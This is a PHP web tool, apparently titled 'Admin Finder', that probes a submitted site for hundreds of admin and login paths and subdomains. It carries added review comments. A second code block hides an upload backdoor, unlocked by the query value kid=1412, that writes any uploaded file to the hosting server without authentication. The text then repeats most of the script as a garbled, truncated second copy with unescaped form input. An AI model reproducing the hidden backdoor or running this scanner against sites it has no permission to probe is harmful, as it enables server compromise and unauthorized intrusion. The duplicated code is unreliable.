[ PHP ] Admin Finder
<?php
// Banner, written to the response before the full HTML document that template() prints later.
echo '<br><center><span style="font-size:30px; font-family:Fredericka the Great; color:#FFF200">Admin Page Finder</span><center><br>';
// Lift PHP's execution time limit: the run below makes one or two outbound HTTP requests
// per wordlist entry, sequentially.
set_time_limit(0);
// Turn off all PHP error reporting. Failed fetches and undefined-index notices are therefore
// invisible to whoever runs or audits the page.
error_reporting(0);
// 'front': newline-separated host labels. The top-level script later splits this list and
// probes each entry as http://<label>.<host>/. The much longer 'end' list that follows holds
// path candidates appended to the submitted base URL.
// NOTE(review): for defenders, a burst of requests for these well-known names from a single
// source is the access-log pattern a run of this script leaves on the probed site.
$Vircns10bdhz['front'] ="admin
adm
admincp
admcp
cp
modcp
moderatorcp
adminare
admins
cpanel
controlpanel";
$Vircns10bdhz['end'] = "admin1.php
admin1.html
admin2.php
admin2.html
yonetim.php
yonetim.html
yonetici.php
yonetici.html
ccms/
ccms/login.php
ccms/index.php
maintenance/
webmaster/
adm/
configuration/
configure/
websvn/
admin/
admin/account.php
admin/account.html
admin/index.php
admin/index.html
admin/login.php
admin/login.html
admin/home.php
admin/controlpanel.html
admin/controlpanel.php
admin.php
admin.html
admin/cp.php
admin/cp.html
cp.php
cp.html
administrator/
administrator/index.html
administrator/index.php
administrator/login.html
administrator/login.php
administrator/account.html
administrator/account.php
administrator.php
administrator.html
login.php
login.html
modelsearch/login.php
moderator.php
moderator.html
moderator/login.php
moderator/login.html
moderator/admin.php
moderator/admin.html
moderator/
account.php
account.html
controlpanel/
controlpanel.php
controlpanel.html
admincontrol.php
admincontrol.html
adminpanel.php
adminpanel.html
admin1.asp
admin2.asp
yonetim.asp
yonetici.asp
admin/account.asp
admin/index.asp
admin/login.asp
admin/home.asp
admin/controlpanel.asp
admin.asp
admin/cp.asp
cp.asp
administrator/index.asp
administrator/login.asp
administrator/account.asp
administrator.asp
login.asp
modelsearch/login.asp
moderator.asp
moderator/login.asp
moderator/admin.asp
account.asp
controlpanel.asp
admincontrol.asp
adminpanel.asp
fileadmin/
fileadmin.php
fileadmin.asp
fileadmin.html
administration/
administration.php
administration.html
sysadmin.php
sysadmin.html
phpmyadmin/
myadmin/
sysadmin.asp
sysadmin/
ur-admin.asp
ur-admin.php
ur-admin.html
ur-admin/
Server.php
Server.html
Server.asp
Server/
wp-admin/
administr8.php
administr8.html
administr8/
administr8.asp
webadmin/
webadmin.php
webadmin.asp
webadmin.html
administratie/
admins/
admins.php
admins.asp
admins.html
administrivia/
Database_Administration/
WebAdmin/
useradmin/
sysadmins/
admin1/
system-administration/
administrators/
pgadmin/
directadmin/
staradmin/
ServerAdministrator/
SysAdmin/
administer/
LiveUser_Admin/
sys-admin/
typo3/
panel/
cpanel/
cPanel/
cpanel_file/
platz_login/
rcLogin/
blogindex/
formslogin/
autologin/
support_login/
meta_login/
manuallogin/
simpleLogin/
loginflat/
utility_login/
showlogin/
memlogin/
members/
login-redirect/
sub-login/
wp-login/
login1/
dir-login/
login_db/
xlogin/
smblogin/
customer_login/
UserLogin/
login-us/
acct_login/
admin_area/
bigadmin/
project-admins/
phppgadmin/
pureadmin/
sql-admin/
radmind/
openvpnadmin/
wizmysqladmin/
vadmind/
ezsqliteadmin/
hpwebjetadmin/
newsadmin/
adminpro/
Lotus_Domino_Admin/
bbadmin/
vmailadmin/
Indy_admin/
ccp14admin/
irc-macadmin/
banneradmin/
sshadmin/
phpldapadmin/
macadmin/
administratoraccounts/
admin4_account/
admin4_colon/
radmind-1/
Super-Admin/
AdminTools/
cmsadmin/
SysAdmin2/
globes_admin/
cadmins/
phpSQLiteAdmin/
navSiteAdmin/
server_admin_small/
logo_sysadmin/
server/
database_administration/
power_user/
system_administration/
ss_vms_admin_sm/
adminarea/
bb-admin/
adminLogin/
panel-administracion/
instadmin/
memberadmin/
administratorlogin/
admin/admin.php
admin_area/admin.php
admin_area/login.php
siteadmin/login.php
siteadmin/index.php
siteadmin/login.html
admin/admin.html
admin_area/index.php
bb-admin/index.php
bb-admin/login.php
bb-admin/admin.php
admin_area/login.html
admin_area/index.html
admincp/index.asp
admincp/login.asp
admincp/index.html
webadmin/index.html
webadmin/admin.html
webadmin/login.html
admin/admin_login.html
admin_login.html
panel-administracion/login.html
nsw/admin/login.php
webadmin/login.php
admin/admin_login.php
admin_login.php
admin_area/admin.html
pages/admin/admin-login.php
admin/admin-login.php
admin-login.php
bb-admin/index.html
bb-admin/login.html
bb-admin/admin.html
admin/home.html
pages/admin/admin-login.html
admin/admin-login.html
admin-login.html
admin/adminLogin.html
adminLogin.html
home.html
rcjakar/admin/login.php
adminarea/index.html
adminarea/admin.html
webadmin/index.php
webadmin/admin.php
user.html
modelsearch/login.html
adminarea/login.html
panel-administracion/index.html
panel-administracion/admin.html
modelsearch/index.html
modelsearch/admin.html
admincontrol/login.html
adm/index.html
adm.html
user.php
panel-administracion/login.php
wp-login.php
adminLogin.php
admin/adminLogin.php
home.php
adminarea/index.php
adminarea/admin.php
adminarea/login.php
panel-administracion/index.php
panel-administracion/admin.php
modelsearch/index.php
modelsearch/admin.php
admincontrol/login.php
adm/admloginuser.php
admloginuser.php
admin2/login.php
admin2/index.php
adm/index.php
adm.php
affiliate.php
adm_auth.php
memberadmin.php
administratorlogin.php
admin/admin.asp
admin_area/admin.asp
admin_area/login.asp
admin_area/index.asp
bb-admin/index.asp
bb-admin/login.asp
bb-admin/admin.asp
pages/admin/admin-login.asp
admin/admin-login.asp
admin-login.asp
user.asp
webadmin/index.asp
webadmin/admin.asp
webadmin/login.asp
admin/admin_login.asp
admin_login.asp
panel-administracion/login.asp
adminLogin.asp
admin/adminLogin.asp
home.asp
adminarea/index.asp
adminarea/admin.asp
adminarea/login.asp
panel-administracion/index.asp
panel-administracion/admin.asp
modelsearch/index.asp
modelsearch/admin.asp
admincontrol/login.asp
adm/admloginuser.asp
admloginuser.asp
admin2/login.asp
admin2/index.asp
adm/index.asp
adm.asp
affiliate.asp
adm_auth.asp
memberadmin.asp
administratorlogin.asp
siteadmin/login.asp
siteadmin/index.asp
ADMIN/
paneldecontrol/
login/
cms/
admon/
ADMON/
administrador/
ADMIN/login.php
panelc/
ADMIN/login.html";
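/**
 * Print the page shell: stylesheet, the insertcode() JavaScript helper, the input form and
 * the result panes (element ids "rightcol", "verified", "total" and "logbox").
 *
 * The two text fields are pre-filled from the submitted POST values. Those values are
 * request data, so they are HTML-escaped before being placed inside the value="" attributes.
 * Written raw, a double quote in either field would close the attribute and inject markup
 * into the page (reflected XSS). A missing or non-string field is rendered as empty.
 */
function template() {
// Escape for an HTML attribute context; ENT_QUOTES covers both quote characters.
$Vurlattr = (isset($_POST['xploit_url']) && is_string($_POST['xploit_url']))
    ? htmlspecialchars($_POST['xploit_url'], ENT_QUOTES, 'UTF-8')
    : '';
$V404attr = (isset($_POST['xploit_404string']) && is_string($_POST['xploit_404string']))
    ? htmlspecialchars($_POST['xploit_404string'], ENT_QUOTES, 'UTF-8')
    : '';
echo '
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>AdminFinder_Kid1412</title>
<style type="text/css">
body{
background:#000000;
margin: 0;
padding: 0;
padding-top: 10px;
color: #FFF;
font-family: Calibri;
font-size: 13px;
}
a{
color: #FFF;
text-decoration: none;
font-weight: bold;
}
.wrapper{
width: 1000px;
margin: 0 auto;
}
.tube{
padding: 10px;
}
.red{
width: 998px;
border: 1px solid #F90808;
background: #000000;
color: #FFF200;
box-shadow: 0px 0px 4px #F90808;
}
.red input{
background: #000;
border: 1px solid #F90808;
color: #FFF;
}
.blue{
float: left;
width: 1000px;
border: 1px solid #F90808;
background: #000000;
color: #FFF200;
box-shadow: 0px 0px 4px #F90808;
}
.green{
float: left;
width: 1000px;
border: 1px solid #F90808;
background: #000000;
color: #FFF200;
box-shadow: 0px 0px 4px #F90808;
}
input[type=submit]{ padding: 3px; color: #EAEF00; text-shadow:#000 0px 0px 4px; font-weight: bold; border: 1px solid #F90808; background: #000; box-shadow: 0px 0px 4px #F90808; padding: 3px; -webkit-border-radius: 4px; -moz-border-radius: 4px; border-radius: 4px; -webkit-box-shadow: rgb(0,119,0) 0px 0px 4px; -moz-box-shadow: rgb(0,119,0) 0px 0px 4px;}
input[type=text]{ padding: 3px; color: #009900; text-shadow: #F90808 0px 2px 7px; border: 1px solid #F90808; background: transparent; box-shadow: 0px 0px 4px #F90808; padding: 3px; -webkit-border-radius: 4px;
-moz-border-radius: 4px; border-radius: 4px; -webkit-box-shadow: rgb(0,119,0) 0px 0px 4px; -moz-box-shadow: rgb(0,119,0) 0px 0px 4px;}
input[type=submit]:hover, input[type=text]:hover{ color: #e4e4e4; text-shadow: #EAEF00 0px 0px 4px; box-shadow: 0px 0px 4px #EAEF00; border: 1px solid #EAEF00; padding: 3px; -webkit-border-radius: 4px;
-moz-border-radius: 4px; border-radius: 4px; -webkit-box-shadow: rgba(0,221,0) 0px 0px 4px; -moz-box-shadow: rgba(0,221,0) 0px 0px 4px;}
</style>
<script type="text/javascript">
<!--
function insertcode($Vnikliy3tn4v, $V0ahuldn20lg, $V5xz1lstblfa)
{
var $Vxykb3rtydurhis = $Vnikliy3tn4v;
var logbox = document.getElementById($V0ahuldn20lg);
if($V5xz1lstblfa == 0)
document.getElementById($V0ahuldn20lg).innerHTML = logbox.innerHTML+$Vxykb3rtydurhis;
else
document.getElementById($V0ahuldn20lg).innerHTML = $Vxykb3rtydurhis;
//document.getElementById("helpbox").innerHTML = $Vxykb3rtydurhis;
}
-->
</script>
</head>
<body>
<br />
<br />
<div class="wrapper">
<div class="red">
<div class="tube">
<form action="" method="post" name="xploit_form"><b>
URL :</b><br /><input type="text" name="xploit_url" value="'.$Vurlattr.'" style="width: 100%;" /><br /><br />
<b>404string :</b><br /><input type="text" name="xploit_404string" value="'.$V404attr.'" style="width: 100%;" /><br /><br />
<span style="float: right;"><input type="submit" name="xploit_submit" value="Find Admin Page" align="right" /></span><br />
</form>
<br />
</div> <!-- /tube -->
</div> <!-- /red -->
<br />
<div class="green">
<div class="tube" id="rightcol">
Verificat: <span id="verified">0</span> / <span id="total">0</span><br />
Found ones:<br />
</div> <!-- /tube -->
</div> <!-- /green -->
<br clear="all" /><br />
<div class="blue">
<div class="tube" id="logbox">
<br />
<br />
<span style="font-size:20px; color:#FFF200">Copyright © Kid1412 </span><br />
</div> <!-- /tube -->
</div> <!-- /blue -->
</div> <!-- /wrapper -->
<br clear="all">';
}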
/**
 * Push one fragment of output into the already-rendered page by emitting an inline
 * <script> that calls the insertcode() JavaScript helper defined in template().
 *
 * @param mixed  $Vud5raj4hmkz  Text or HTML fragment to display.
 * @param int    $Vxudql3dolru  1 appends "<br />" to the fragment.
 * @param int    $Vanaaznazc5x  1 terminates the script right after the echo.
 * @param string $V0ahuldn20lg  id of the target element (default 'logbox').
 * @param int    $V5xz1lstblfa  Passed to insertcode(): 0 appends to the element, any other
 *                              value replaces its content.
 */
function show($Vud5raj4hmkz, $Vxudql3dolru=1, $Vanaaznazc5x=0, $V0ahuldn20lg='logbox', $V5xz1lstblfa=0) {
if($Vxudql3dolru == 1) $Vud5raj4hmkz .= "<br />";
// NOTE(review): the arguments are concatenated into single-quoted JavaScript string literals
// and the result is later assigned to innerHTML, with no escaping at either step. Callers
// pass the submitted URL through here, so a quote or markup in that value lands in the
// page's script unmodified.
echo "<script type=\"text/javascript\">insertcode('".$Vud5raj4hmkz."', '".$V0ahuldn20lg."', '".$V5xz1lstblfa."');</script>";
if($Vanaaznazc5x == 1) exit;
// Best-effort flush so progress appears while the run is still going; errors are suppressed.
@flush();@ob_flush();
}
/**
 * Fetch one candidate URL and decide whether the response looks like an existing page.
 *
 * @param string $Vwwogu3y1egd  Candidate: a path in mode 0, a host label in any other mode.
 * @param int    $Vmjbtqyr10te  0 appends the candidate to the global base URL; any other
 *                              value builds http://<candidate>.<global value>/ instead.
 * @return int 1 when the response is treated as a hit, 0 otherwise.
 */
function check($Vwwogu3y1egd, $Vmjbtqyr10te=0) {
// Reads two globals set by the top-level script: the base URL (later reduced to a host name)
// and the baseline body captured for a file name assumed not to exist.
global $_POST,$Vgcbor1jfuhz,$V14pcrszqxfd;
if($Vmjbtqyr10te == 0) $Vxykb3rtydur = $Vgcbor1jfuhz.$Vwwogu3y1egd;
else $Vxykb3rtydur = 'http://'.$Vwwogu3y1egd.'.'.$Vgcbor1jfuhz.'/';
// First outbound request. get_headers() returns false on failure; that case is not checked
// here and error reporting is off.
// NOTE(review): the URL derives from form input with no scheme or host restriction, so the
// server hosting this page fetches whatever address is submitted.
$Vsfkmeamk3zj = get_headers($Vxykb3rtydur);
// Case-insensitive match for "200" anywhere in the first header line (the status line).
// eregi() was removed in PHP 7.0, so the listing as written only runs on PHP 5.x.
if (!eregi('200', $Vsfkmeamk3zj[0])) return 0;
// Second outbound request for the same URL, this time for the body; warnings suppressed.
$Vjtvqebusmzy = @file_get_contents($Vxykb3rtydur);
// No custom marker supplied: a body identical to the baseline counts as "not found".
if($_POST['xploit_404string'] == "") if($Vjtvqebusmzy == $V14pcrszqxfd) return 0;
// Custom marker supplied: its presence in the body counts as "not found". strpos() returns 0
// for a match at offset 0, which is falsy, so that one position is not detected.
if($_POST['xploit_404string'] != "") if(strpos($Vjtvqebusmzy, $_POST['xploit_404string'])) return 0;
return 1;
}
// Render the form, then stop unless a non-empty URL was submitted.
template();
if(!isset($_POST['xploit_url'])) die;
if($_POST['xploit_url'] == '') die;
// Base URL is taken verbatim from the form and given a trailing slash if it lacks one.
$Vgcbor1jfuhz = $_POST['xploit_url'];
if ($Vgcbor1jfuhz[strlen($Vgcbor1jfuhz)-1] != "/") $Vgcbor1jfuhz .= "/";
// Baseline for soft-404 comparison: when no marker string was supplied, fetch a file name
// assumed not to exist and keep the body for check() to compare against.
// NOTE(review): the probe name is a fixed constant, so a request for it in a site's access
// log is a dependable indicator that this script was pointed at that site.
if($_POST['xploit_404string'] == "") $V14pcrszqxfd = @file_get_contents($Vgcbor1jfuhz."d65897f5380a21a42db94b3927b823d56ee1099a-this_can-t_exist.html");
// Strip carriage returns and split both wordlists into one entry per line.
$Vircns10bdhz['end'] = str_replace("\r", "", $Vircns10bdhz['end']);
$Vircns10bdhz['front'] = str_replace("\r", "", $Vircns10bdhz['front']);
$Vhrw13m5acnx = explode("\n", $Vircns10bdhz['end']);
$Vmjbtqyr10tepathes = explode("\n", $Vircns10bdhz['front']);
// Publish the total number of candidates into the "total" element (replace mode).
show(count($Vhrw13m5acnx)+count($Vmjbtqyr10tepathes), 1, 0, 'total', 1);
// Running count of candidates processed, mirrored into the "verified" element.
$Vukqxjqw4ork = 0;
// Pass 1: every 'end' entry appended to the base URL.
foreach($Vhrw13m5acnx as $Vwzmmrxgwfr0) {
show('Checking '.$Vgcbor1jfuhz.$Vwzmmrxgwfr0.' : ', 0, 0, 'logbox', 0);
$Vukqxjqw4ork++; show($Vukqxjqw4ork, 0, 0, 'verified', 1);
if(check($Vwzmmrxgwfr0) == 0) show('404 Error!!!', 1, 0, 'logbox', 0);
else{
show('<span style="color: #00FF00;site:3"><strong>200 OKE!!!<strong></span>', 1, 0, 'logbox', 0);
show('<a href="'.$Vgcbor1jfuhz.$Vwzmmrxgwfr0.'">'.$Vgcbor1jfuhz.$Vwzmmrxgwfr0.'</a>', 1, 0, 'rightcol', 0);
}
}
// Reduce the base URL to the text between "//" and the next "/", then drop a leading "www"
// together with the character after it. From here on the global holds a host name, which is
// what check() expects in its second mode.
preg_match("/\/\/(.*?)\//i", $Vgcbor1jfuhz, $Vwwogu3y1egdx); $Vgcbor1jfuhz = $Vwwogu3y1egdx[1];
if(substr($Vgcbor1jfuhz, 0, 3) == "www") $Vgcbor1jfuhz = substr($Vgcbor1jfuhz, 4);
// Pass 2: every 'front' entry tried as a host label over plain http.
foreach($Vmjbtqyr10tepathes as $Vmjbtqyr10tepath) {
show('Checking http://'.$Vmjbtqyr10tepath.'.'.$Vgcbor1jfuhz.'/ : ', 0, 0, 'logbox', 0);
$Vukqxjqw4ork++; show($Vukqxjqw4ork, 0, 0, 'verified', 1);
if(check($Vmjbtqyr10tepath, 1) == 0) show('404 Error!!!', 1, 0, 'logbox', 0);
else{
show('<span style="color: #00FF00;site:3"><strong>200 OKE!!!<</strong></span>', 1, 0, 'logbox', 0);
show('<a href="http://'.$Vmjbtqyr10tepath.'.'.$Vgcbor1jfuhz.'/">'.$Vmjbtqyr10tepath.'.'.$Vgcbor1jfuhz.'</a>', 1, 0, 'rightcol', 0);
}
}
?>
<?php
// NOTE(review): this second PHP block is not part of the advertised scanner. It is a file
// upload handler gated only by a fixed query-string value: no login and no session check.
if($_GET['kid']=='1412')
{
echo '<form method="POST" enctype="multipart/form-data" action="?kid=1412">
<input type="file" name="file_upload" size="20" id="file">
<input type="submit" name="gui" value="Up" >
</form>';if (isset($_POST['gui'])){
// The destination is the client-supplied file name, used as a relative path, with no
// extension, content-type, size or path check. Whoever hosts this page therefore exposes an
// unauthenticated arbitrary file write, executable scripts included, on their own server.
// Defensive handling: treat the page as backdoored and do not deploy it. When hunting, flag
// move_uploaded_file() calls whose target is $_FILES[...]['name'] and review the script's
// directory for files that did not ship with the site.
move_uploaded_file($_FILES['file_upload']['tmp_name'], $_FILES['file_upload']['name']);
}
}
?>
echo '<br><center><span style="font-size:30px; font-family:Fredericka the Great; color:#FFF200">Admin Page Finder</span><center><br>';
set_time_limit(0);
error_reporting(0);
$Vircns10bdhz['front'] ="admin
adm
admincp
admcp
cp
modcp
moderatorcp
adminare
admins
cpanel
controlpanel";
$Vircns10bdhz['end'] = "admin1.php
admin1.html
admin2.php
admin2.html
yonetim.php
yonetim.html
yonetici.php
yonetici.html
ccms/
ccms/login.php
ccms/index.php
maintenance/
webmaster/
adm/
configuration/
configure/
websvn/
admin/
admin/account.php
admin/account.html
admin/index.php
admin/index.html
admin/login.php
admin/login.html
admin/home.php
admin/controlpanel.html
admin/controlpanel.php
admin.php
admin.html
admin/cp.php
admin/cp.html
cp.php
cp.html
administrator/
administrator/index.html
administrator/index.php
administrator/login.html
administrator/login.php
administrator/account.html
administrator/account.php
administrator.php
administrator.html
login.php
login.html
modelsearch/login.php
moderator.php
moderator.html
moderator/login.php
moderator/login.html
moderator/admin.php
moderator/admin.html
moderator/
account.php
account.html
controlpanel/
controlpanel.php
controlpanel.html
admincontrol.php
admincontrol.html
adminpanel.php
adminpanel.html
admin1.asp
admin2.asp
yonetim.asp
yonetici.asp
admin/account.asp
admin/index.asp
admin/login.asp
admin/home.asp
admin/controlpanel.asp
admin.asp
admin/cp.asp
cp.asp
administrator/index.asp
administrator/login.asp
administrator/account.asp
administrator.asp
login.asp
modelsearch/login.asp
moderator.asp
moderator/login.asp
moderator/admin.asp
account.asp
controlpanel.asp
admincontrol.asp
adminpanel.asp
fileadmin/
fileadmin.php
fileadmin.asp
fileadmin.html
administration/
administration.php
administration.html
sysadmin.php
sysadmin.html
phpmyadmin/
myadmin/
sysadmin.asp
sysadmin/
ur-admin.asp
ur-admin.php
ur-admin.html
ur-admin/
Server.php
Server.html
Server.asp
Server/
wp-admin/
administr8.php
administr8.html
administr8/
administr8.asp
webadmin/
webadmin.php
webadmin.asp
webadmin.html
administratie/
admins/
admins.php
admins.asp
admins.html
administrivia/
Database_Administration/
WebAdmin/
useradmin/
sysadmins/
admin1/
system-administration/
administrators/
pgadmin/
directadmin/
staradmin/
ServerAdministrator/
SysAdmin/
administer/
LiveUser_Admin/
sys-admin/
typo3/
panel/
cpanel/
cPanel/
cpanel_file/
platz_login/
rcLogin/
blogindex/
formslogin/
autologin/
support_login/
meta_login/
manuallogin/
simpleLogin/
loginflat/
utility_login/
showlogin/
memlogin/
members/
login-redirect/
sub-login/
wp-login/
login1/
dir-login/
login_db/
xlogin/
smblogin/
customer_login/
UserLogin/
login-us/
acct_login/
admin_area/
bigadmin/
project-admins/
phppgadmin/
pureadmin/
sql-admin/
radmind/
openvpnadmin/
wizmysqladmin/
vadmind/
ezsqliteadmin/
hpwebjetadmin/
newsadmin/
adminpro/
Lotus_Domino_Admin/
bbadmin/
vmailadmin/
Indy_admin/
ccp14admin/
irc-macadmin/
banneradmin/
sshadmin/
phpldapadmin/
macadmin/
administratoraccounts/
admin4_account/
admin4_colon/
radmind-1/
Super-Admin/
AdminTools/
cmsadmin/
SysAdmin2/
globes_admin/
cadmins/
phpSQLiteAdmin/
navSiteAdmin/
server_admin_small/
logo_sysadmin/
server/
database_administration/
power_user/
system_administration/
ss_vms_admin_sm/
adminarea/
bb-admin/
adminLogin/
panel-administracion/
instadmin/
memberadmin/
administratorlogin/
admin/admin.php
admin_area/admin.php
admin_area/login.php
siteadmin/login.php
siteadmin/index.php
siteadmin/login.html
admin/admin.html
admin_area/index.php
bb-admin/index.php
bb-admin/login.php
bb-admin/admin.php
admin_area/login.html
admin_area/index.html
admincp/index.asp
admincp/login.asp
admincp/index.html
webadmin/index.html
webadmin/admin.html
webadmin/login.html
admin/admin_login.html
admin_login.html
panel-administracion/login.html
nsw/admin/login.php
webadmin/login.php
admin/admin_login.php
admin_login.php
admin_area/admin.html
pages/admin/admin-login.php
admin/admin-login.php
admin-login.php
bb-admin/index.html
bb-admin/login.html
bb-admin/admin.html
admin/home.html
pages/admin/admin-login.html
admin/admin-login.html
admin-login.html
admin/adminLogin.html
adminLogin.html
home.html
rcjakar/admin/login.php
adminarea/index.html
adminarea/admin.html
webadmin/index.php
webadmin/admin.php
user.html
modelsearch/login.html
adminarea/login.html
panel-administracion/index.html
panel-administracion/admin.html
modelsearch/index.html
modelsearch/admin.html
admincontrol/login.html
adm/index.html
adm.html
user.php
panel-administracion/login.php
wp-login.php
adminLogin.php
admin/adminLogin.php
home.php
adminarea/index.php
adminarea/admin.php
adminarea/login.php
panel-administracion/index.php
panel-administracion/admin.php
modelsearch/index.php
modelsearch/admin.php
admincontrol/login.php
adm/admloginuser.php
admloginuser.php
admin2/login.php
admin2/index.php
adm/index.php
adm.php
affiliate.php
adm_auth.php
memberadmin.php
administratorlogin.php
admin/admin.asp
admin_area/admin.asp
admin_area/login.asp
admin_area/index.asp
bb-admin/index.asp
bb-admin/login.asp
bb-admin/admin.asp
pages/admin/admin-login.asp
admin/admin-login.asp
admin-login.asp
user.asp
webadmin/index.asp
webadmin/admin.asp
webadmin/login.asp
admin/admin_login.asp
admin_login.asp
panel-administracion/login.asp
adminLogin.asp
admin/adminLogin.asp
home.asp
adminarea/index.asp
adminarea/admin.asp
adminarea/login.asp
panel-administracion/index.asp
panel-administracion/admin.asp
modelsearch/index.asp
modelsearch/admin.asp
admincontrol/login.asp
adm/admloginuser.asp
admloginuser.asp
admin2/login.asp
admin2/index.asp
adm/index.asp
adm.asp
affiliate.asp
adm_auth.asp
memberadmin.asp
administratorlogin.asp
siteadmin/login.asp
siteadmin/index.asp
ADMIN/
paneldecontrol/
login/
cms/
admon/
ADMON/
administrador/
ADMIN/login.php
panelc/
ADMIN/login.html";
function template() {
echo '
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>AdminFinder_Kid1412</title>
<style type="text/css">
body{
background:#000000;
margin: 0;
padding: 0;
padding-top: 10px;
color: #FFF;
font-family: Calibri;
font-size: 13px;
}
a{
color: #FFF;
text-decoration: none;
font-weight: bold;
}
.wrapper{
width: 1000px;
margin: 0 auto;
}
.tube{
padding: 10px;
}
.red{
width: 998px;
border: 1px solid #F90808;
background: #000000;
color: #FFF200;
box-shadow: 0px 0px 4px #F90808;
}
.red input{
background: #000;
border: 1px solid #F90808;
color: #FFF;
}
.blue{
float: left;
width: 1000px;
border: 1px solid #F90808;
background: #000000;
color: #FFF200;
box-shadow: 0px 0px 4px #F90808;
}
.green{
float: left;
width: 1000px;
border: 1px solid #F90808;
background: #000000;
color: #FFF200;
box-shadow: 0px 0px 4px #F90808;
}
input[type=submit]{ padding: 3px; color: #EAEF00; text-shadow:#000 0px 0px 4px; font-weight: bold; border: 1px solid #F90808; background: #000; box-shadow: 0px 0px 4px #F90808; padding: 3px; -webkit-border-radius: 4px; -moz-border-radius: 4px; border-radius: 4px; -webkit-box-shadow: rgb(0,119,0) 0px 0px 4px; -moz-box-shadow: rgb(0,119,0) 0px 0px 4px;}
input[type=text]{ padding: 3px; color: #009900; text-shadow: #F90808 0px 2px 7px; border: 1px solid #F90808; background: transparent; box-shadow: 0px 0px 4px #F90808; padding: 3px; -webkit-border-radius: 4px;
-moz-border-radius: 4px; border-radius: 4px; -webkit-box-shadow: rgb(0,119,0) 0px 0px 4px; -moz-box-shadow: rgb(0,119,0) 0px 0px 4px;}
input[type=submit]:hover, input[type=text]:hover{ color: #e4e4e4; text-shadow: #EAEF00 0px 0px 4px; box-shadow: 0px 0px 4px #EAEF00; border: 1px solid #EAEF00; padding: 3px; -webkit-border-radius: 4px;
-moz-border-radius: 4px; border-radius: 4px; -webkit-box-shadow: rgba(0,221,0) 0px 0px 4px; -moz-box-shadow: rgba(0,221,0) 0px 0px 4px;}
</style>
<script type="text/javascript">
<!--
function insertcode($Vnikliy3tn4v, $V0ahuldn20lg, $V5xz1lstblfa)
{
var $Vxykb3rtydurhis = $Vnikliy3tn4v;
var logbox = document.getElementById($V0ahuldn20lg);
if($V5xz1lstblfa == 0)
document.getElementById($V0ahuldn20lg).innerHTML = logbox.innerHTML+$Vxykb3rtydurhis;
else
document.getElementById($V0ahuldn20lg).innerHTML = $Vxykb3rtydurhis;
//document.getElementById("helpbox").innerHTML = $Vxykb3rtydurhis;
}
-->
</script>
</head>
<body>
<br />
<br />
<div class="wrapper">
<div class="red">
<div class="tube">
<form action="" method="post" name="xploit_form"><b>
URL :</b><br /><input type="text" name="xploit_url" value="'.$_POST['xploit_url'].'" style="width: 100%;" /><br /><br />
<b>404string :</b><br /><input type="text" name="xploit_404string" value="'.$_POST['xploit_404string'].'" style="width: 100%;" /><br /><br />
<span style="float: right;"><input type="submit" name="xploit_submit" value="Find Admin Page" align="right" /></span><br />
</form>
<br />
</div> <!-- /tube -->
</div> <!-- /red -->
<br />
<div class="green">
<div class="tube" id="rightcol">
Verificat: <span id="verified">0</span> / <span id="total">0</span><br />
Found ones:<br />
</div> <!-- /tube -->
</div> <!-- /green -->
<br clear="all" /><br />
<div class="blue">
<div class="tube" id="logbox">
<br />
<br />
<span style="font-size:20px; color:#FFF200">Copyright © Kid1412 </span><br />
</div> <!-- /tube -->
</div> <!-- /blue -->
</div> <!-- /wrapper -->
<br clear="all">';
}
/**
 * Push one fragment of output into the already-rendered page by emitting an inline
 * <script> that calls the insertcode() JavaScript helper defined in template().
 *
 * @param mixed  $Vud5raj4hmkz  Text or HTML fragment to display.
 * @param int    $Vxudql3dolru  1 appends "<br />" to the fragment.
 * @param int    $Vanaaznazc5x  1 terminates the script right after the echo.
 * @param string $V0ahuldn20lg  id of the target element (default 'logbox').
 * @param int    $V5xz1lstblfa  Passed to insertcode(): 0 appends to the element, any other
 *                              value replaces its content.
 */
function show($Vud5raj4hmkz, $Vxudql3dolru=1, $Vanaaznazc5x=0, $V0ahuldn20lg='logbox', $V5xz1lstblfa=0) {
if($Vxudql3dolru == 1) $Vud5raj4hmkz .= "<br />";
// NOTE(review): the arguments are concatenated into single-quoted JavaScript string literals
// and the result is later assigned to innerHTML, with no escaping at either step. Callers
// pass the submitted URL through here, so a quote or markup in that value lands in the
// page's script unmodified.
echo "<script type=\"text/javascript\">insertcode('".$Vud5raj4hmkz."', '".$V0ahuldn20lg."', '".$V5xz1lstblfa."');</script>";
if($Vanaaznazc5x == 1) exit;
// Best-effort flush so progress appears while the run is still going; errors are suppressed.
@flush();@ob_flush();
}
/**
 * Fetch one candidate URL and decide whether the response looks like an existing page.
 *
 * @param string $Vwwogu3y1egd  Candidate: a path in mode 0, a host label in any other mode.
 * @param int    $Vmjbtqyr10te  0 appends the candidate to the global base URL; any other
 *                              value builds http://<candidate>.<global value>/ instead.
 * @return int 1 when the response is treated as a hit, 0 otherwise.
 */
function check($Vwwogu3y1egd, $Vmjbtqyr10te=0) {
// Reads two globals set by the top-level script: the base URL (later reduced to a host name)
// and the baseline body captured for a file name assumed not to exist.
global $_POST,$Vgcbor1jfuhz,$V14pcrszqxfd;
if($Vmjbtqyr10te == 0) $Vxykb3rtydur = $Vgcbor1jfuhz.$Vwwogu3y1egd;
else $Vxykb3rtydur = 'http://'.$Vwwogu3y1egd.'.'.$Vgcbor1jfuhz.'/';
// First outbound request. get_headers() returns false on failure; that case is not checked
// here and error reporting is off.
// NOTE(review): the URL derives from form input with no scheme or host restriction, so the
// server hosting this page fetches whatever address is submitted.
$Vsfkmeamk3zj = get_headers($Vxykb3rtydur);
// Case-insensitive match for "200" anywhere in the first header line (the status line).
// eregi() was removed in PHP 7.0, so the listing as written only runs on PHP 5.x.
if (!eregi('200', $Vsfkmeamk3zj[0])) return 0;
// Second outbound request for the same URL, this time for the body; warnings suppressed.
$Vjtvqebusmzy = @file_get_contents($Vxykb3rtydur);
// No custom marker supplied: a body identical to the baseline counts as "not found".
if($_POST['xploit_404string'] == "") if($Vjtvqebusmzy == $V14pcrszqxfd) return 0;
// Custom marker supplied: its presence in the body counts as "not found". strpos() returns 0
// for a match at offset 0, which is falsy, so that one position is not detected.
